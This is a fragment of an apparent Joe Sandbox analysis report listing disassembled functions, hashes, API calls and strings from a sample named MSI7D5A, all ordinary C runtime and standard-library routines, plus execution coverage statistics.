                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 2544715827-2799312399
                                                      • Opcode ID: 443169c97151d6078239d40411141fa65f6a5ec53ff780d2fcc1e70b9615a869
                                                      • Instruction ID: 0ce97ccc7ba4290b7f3c66df3af717107fc693175143e9287b55740266011878
                                                      • Opcode Fuzzy Hash: 443169c97151d6078239d40411141fa65f6a5ec53ff780d2fcc1e70b9615a869
                                                      • Instruction Fuzzy Hash: 43C19738E042889FDF15DFA8C5517ECBBB2BF95300F244059E8956B247D7359D4ACB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A562C8
                                                        • Part of subcall function 00A52D74: __EH_prolog3.LIBCMT ref: 00A52D7B
                                                        • Part of subcall function 00A52D74: std::_Lockit::_Lockit.LIBCPMT ref: 00A52D85
                                                        • Part of subcall function 00A52D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00A52DF6
                                                      • _Find_elem.LIBCPMT ref: 00A56502
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A5633F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 2544715827-2799312399
                                                      • Opcode ID: b5c27e0309e89593175bcc33fb95bccf24b4dc27236b69a3b2e4dc603eb02848
                                                      • Instruction ID: cee584c31a046d4da939edc289d9402d34f0eb3669c373e4aba934c6e70e53f0
                                                      • Opcode Fuzzy Hash: b5c27e0309e89593175bcc33fb95bccf24b4dc27236b69a3b2e4dc603eb02848
                                                      • Instruction Fuzzy Hash: 55C19270E042588BDF25DF64C9417ECBBB2BF51316F948099EC89AB286DB349D8DCB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5669E
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00A4B8DD
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00A4B900
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B928
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B9B7
                                                      • _Find_elem.LIBCPMT ref: 00A568D8
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A56715
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 3042121994-2799312399
                                                      • Opcode ID: 899d8c0b293f3efffb56f4c294f52aa705730a9f348c1d8ad0c1bffa75948fe6
                                                      • Instruction ID: e673e2e58167f042dee03092fcdb38686426ab086878c8891b949882b6ef3881
                                                      • Opcode Fuzzy Hash: 899d8c0b293f3efffb56f4c294f52aa705730a9f348c1d8ad0c1bffa75948fe6
                                                      • Instruction Fuzzy Hash: 27C16F34E04258CBDF25DF64C9517EDBBB2BF55306F948099EC89AB282DB348D89CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00A71AFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 79dcb12207a561c51b937786c4c7804ce88cb4cbfb02e31b66acd12dab2b48a2
                                                      • Instruction ID: d745f3c4f82553db0bd9c2241f9d15604e16df94536ad223d506c176ded2180c
                                                      • Opcode Fuzzy Hash: 79dcb12207a561c51b937786c4c7804ce88cb4cbfb02e31b66acd12dab2b48a2
                                                      • Instruction Fuzzy Hash: 8A515B71A09101EACB11BB58DE0137E37F4EBE0750F20C959F09E861A5EA358C959B87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __aulldiv
                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 3732870572-1956417402
                                                      • Opcode ID: b235f2811001c5b9089e5d8e8323c3e0da641ed5d26d00a3eac53625067913c1
                                                      • Instruction ID: 92116bb7ab74ad58a4905c275c8a026841e0336d45d23ebcf1421944865fc69c
                                                      • Opcode Fuzzy Hash: b235f2811001c5b9089e5d8e8323c3e0da641ed5d26d00a3eac53625067913c1
                                                      • Instruction Fuzzy Hash: DD51F130B04285AEDF258FAC8495BBEBFF9AF46341F18446BE891D7281C7758D41CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00A4BF6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task
                                                      • String ID: false$true
                                                      • API String ID: 118556049-2658103896
                                                      • Opcode ID: e76fc1492ece1b9aac2b2fae51ca9ba5994907ebd64d54bc5b518b105b37643a
                                                      • Instruction ID: 302623fa5c9c382225c25bd7cd27d74446f9c04e5ee2043b78cc63144faf6d4c
                                                      • Opcode Fuzzy Hash: e76fc1492ece1b9aac2b2fae51ca9ba5994907ebd64d54bc5b518b105b37643a
                                                      • Instruction Fuzzy Hash: 3251B3B5D007489FDB10DFA4C941BEEB7F8FF45304F14826AE805AB641E774A949CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \\?\$\\?\UNC\
                                                      • API String ID: 0-3019864461
                                                      • Opcode ID: 391b36bdd34395a68196e59e0ed5e8a77f2b980d89e6f709f9e60a6fd4000d87
                                                      • Instruction ID: e3e75ed70de866a777ea8b2d6b1c94626b7533a9cd27ff8fc0c9239b1fda686f
                                                      • Opcode Fuzzy Hash: 391b36bdd34395a68196e59e0ed5e8a77f2b980d89e6f709f9e60a6fd4000d87
                                                      • Instruction Fuzzy Hash: A951C074E04244ABDF14DF68C985BEEB7B5FF99344F10461DE401BB290DBB5A988CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D501
                                                      • _swprintf.LIBCMT ref: 00A5D573
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                        • Part of subcall function 00A52FC8: __EH_prolog3.LIBCMT ref: 00A52FCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 3050236999-1402515088
                                                      • Opcode ID: 920677bd51f7e6bceac6d77ecd5b633014a1dee611049a48266c24f85c334eb5
                                                      • Instruction ID: 0a239ad0e94fff9a14f3017fa19e3cf219a6be5a74be61273b76282005fb294b
                                                      • Opcode Fuzzy Hash: 920677bd51f7e6bceac6d77ecd5b633014a1dee611049a48266c24f85c334eb5
                                                      • Instruction Fuzzy Hash: E6418B71E00308ABCF05EFE0C945ADDBBB5FF48315F204549E846AB291EB35991ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D7A5
                                                      • _swprintf.LIBCMT ref: 00A5D817
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 1487807907-1402515088
                                                      • Opcode ID: 3ce75bf193679f87f1dbc2c0ff8ad70820f7cdaaec44985b69a8e7911741e759
                                                      • Instruction ID: 9776237fde429fa35129f51f54e3d9f18305aff9c6326c95b798cb1614230eaa
                                                      • Opcode Fuzzy Hash: 3ce75bf193679f87f1dbc2c0ff8ad70820f7cdaaec44985b69a8e7911741e759
                                                      • Instruction Fuzzy Hash: B8418875E00208EBCF05EFE0D945ADEBBB5FF48310F204449E846AB291EB35991ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A6188E
                                                      • _swprintf.LIBCMT ref: 00A61900
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 1487807907-1402515088
                                                      • Opcode ID: c8f76fc5dfd552cf0851fe7d642cc4fa23224d3e28dca81f9607ec5d5507906d
                                                      • Instruction ID: bec9a5a4598f83622461a0589cac4d7b6dd2a0b10e4e1755dcd77748fb9f64bf
                                                      • Opcode Fuzzy Hash: c8f76fc5dfd552cf0851fe7d642cc4fa23224d3e28dca81f9607ec5d5507906d
                                                      • Instruction Fuzzy Hash: DD416A75E00308ABCF05EFE4C955ADEBBB5FF48310F204449E856AB291DB759915CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A6607E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 6f866f3731f4d053a67c6dc54c72dc16a52435d6e612b7e9be673231f99cefcc
                                                      • Instruction ID: 11fd3558f90e377db6cff76fd52783a59ec0d91cd48c63e6dfc64546503f8d86
                                                      • Opcode Fuzzy Hash: 6f866f3731f4d053a67c6dc54c72dc16a52435d6e612b7e9be673231f99cefcc
                                                      • Instruction Fuzzy Hash: 37419A32900209EFCF15DF98CD81AEEBBB5FF49300F188259FA18A7212D3359951DB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3___cftoe
                                                      • String ID: !%x
                                                      • API String ID: 855520168-1893981228
                                                      • Opcode ID: 209d88e90d8cce1f43a426c04ca053d824e172f991294305675dbedc1511fea1
                                                      • Instruction ID: 41c3094dbad220842089874b18ea68e9fa7ad07545be2a7d8de09ae6b15dd12b
                                                      • Opcode Fuzzy Hash: 209d88e90d8cce1f43a426c04ca053d824e172f991294305675dbedc1511fea1
                                                      • Instruction Fuzzy Hash: F7318C71D0020DEBDF08DF94E981AEEB7B6FF48305F104419F805A7251DB75AA49CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3___cftoe
                                                      • String ID: !%x
                                                      • API String ID: 855520168-1893981228
                                                      • Opcode ID: d985e33b0682829007e8ebc7a6a4b93f78306be38277a22da3aa428199fe8a0b
                                                      • Instruction ID: 65ac2309db00f9166dbd44b59e9a50cacea5509607d537f6c67fc96f1ef5c3ff
                                                      • Opcode Fuzzy Hash: d985e33b0682829007e8ebc7a6a4b93f78306be38277a22da3aa428199fe8a0b
                                                      • Instruction Fuzzy Hash: 39319C72D15248AFEF04DFD4D980AEEBBB5EF18340F140019F844A7242D7359A46CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00A45F86
                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,838A949E), ref: 00A45FF6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ConvertFreeLocalString
                                                      • String ID: Invalid SID
                                                      • API String ID: 3201929900-130637731
                                                      • Opcode ID: 0c95fd775913bcc1fd8af235d5bdfa9217ef126df944ea7cf0c69f38e064f998
                                                      • Instruction ID: a1d9764b63dc0603a4c7be998ad0c753c8ed10f7b0c76056f3984035541829a9
                                                      • Opcode Fuzzy Hash: 0c95fd775913bcc1fd8af235d5bdfa9217ef126df944ea7cf0c69f38e064f998
                                                      • Instruction Fuzzy Hash: DF219074A04605DBDB14DFA8C855BAFBBF8FF84714F10491DE402A7380D7B9AA098BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4909B
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A490FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 3988782225-1405518554
                                                      • Opcode ID: 677b2cb4de5b2bb6f018f3a8fbd7c543a5e0014207bb3f67f472078b2dee7e3f
                                                      • Instruction ID: d9fd0387ed894d2c95adfe24196c5569a2ff646afb0f348ca862a9392669ffd3
                                                      • Opcode Fuzzy Hash: 677b2cb4de5b2bb6f018f3a8fbd7c543a5e0014207bb3f67f472078b2dee7e3f
                                                      • Instruction Fuzzy Hash: E121C070905B84EED721CFA8C904B4BBFF4EF19710F108A9EE49597781D3B5A608CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_
                                                      • String ID: false$true
                                                      • API String ID: 2427045233-2658103896
                                                      • Opcode ID: ac625925bf011da7a6f878236f75ea06937352f9ee4a97f446233488db980f2d
                                                      • Instruction ID: 76d8d1a7eecd27e1aa510a8019b0050787bdccee3f013621365bdeb158c26d23
                                                      • Opcode Fuzzy Hash: ac625925bf011da7a6f878236f75ea06937352f9ee4a97f446233488db980f2d
                                                      • Instruction Fuzzy Hash: 011190B5D41744AECB21EFB4D841B9AB7F4AF45300F04C92AE5A69B642EB30E605CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LocalFree.KERNEL32(00000000,00A44261,00A84400,000000FF,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?,00A43A75,?), ref: 00A44096
                                                      • LocalAlloc.KERNEL32(00000040,40000022,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44154
                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44177
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A44217
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree
                                                      • String ID:
                                                      • API String ID: 2012307162-0
                                                      • Opcode ID: 96f8466751beb27a1d2ab48c45f400de4db5b7fe8d9c850a3e063190a5f8841a
                                                      • Instruction ID: df944c0ff3b7e13589a40271320621cd239f99840e4c383428ef98d3adf7a727
                                                      • Opcode Fuzzy Hash: 96f8466751beb27a1d2ab48c45f400de4db5b7fe8d9c850a3e063190a5f8841a
                                                      • Instruction Fuzzy Hash: 2E519075A002059FDB18DFACC985BAEBBB5FB88350F24462DF925E7280D771AD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00A41E01
                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00A41E21
                                                      • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00A41EA7
                                                      • LocalFree.KERNEL32(00000001,838A949E,00000000,00000000,00A83C40,000000FF,?,00000000), ref: 00A41F2D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree
                                                      • String ID:
                                                      • API String ID: 2012307162-0
                                                      • Opcode ID: 82f84a27c77313ac04dd58b91bda332bce3b4a9c74726f434d9c3dea649067d6
                                                      • Instruction ID: 039dcc580f10848d195d865a9734f3848e526916efc53d9eda52d960a58020f3
                                                      • Opcode Fuzzy Hash: 82f84a27c77313ac04dd58b91bda332bce3b4a9c74726f434d9c3dea649067d6
                                                      • Instruction Fuzzy Hash: 9B51047AA042159FC715DF68DC81A6BB7E8FF89360F100B2EF866D7290DB30D9448B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0.1%
                                                      Total number of Nodes:1293
                                                      Total number of Limit Nodes:36
